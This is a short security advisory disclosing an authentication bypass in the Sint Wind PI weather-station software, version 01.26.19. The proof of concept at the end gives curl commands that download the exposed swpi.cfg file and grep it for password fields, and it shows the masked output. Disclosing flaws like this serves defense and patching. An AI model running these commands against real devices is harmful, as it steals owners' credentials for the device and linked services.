Sint Wind PI v01.26.19 Authentication Bypass Vendor: Tonino Tarsi Product web page: https://github.com/ToninoTarsi/swpi Affected version: 01.26.19 Summary: A Meteo Station software for Raspberry PI. Capability include telephone answering, webcams, digital cameras, web. A Sint Wind is a wind condition (and other meteo data) telephone answering machine. This implementation uses a Raspberry PI with an Huawei 3G dongle. The Sint Wind is compatible with different kind of Meteo Sensors (WH1080, WH3080, Davis, TX32, BMP085...). Desc: Insecure Direct Object Reference flaw allows retrieval of configuration file which contains authentication credentials to device and other nodes associated with it. The web application does not check for an authenticated session to access its resources allowing direct access to swpi.cfg (config file) which contains credentials. Tested on: SimpleHTTP/0.6 Python/2.7.3 Raspberry PI Vulnerability discovered by Humberto Cabrera @zeroscience Advisory ID: ZSL-2018-5472 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5472.php 28.05.2018 -- PoC: -- curl http://target/swpi.cfg | grep -i pwd smspwd = [*] gmail_pwd = [*] dnsexit_pwd = [*] -- curl http://target/swpi.cfg | grep -i pass ftpserverpassowd = [*] weatherunderground_password = [*] pws_password = XXXXXXXX cwop_password = -1 windfinder_password = ******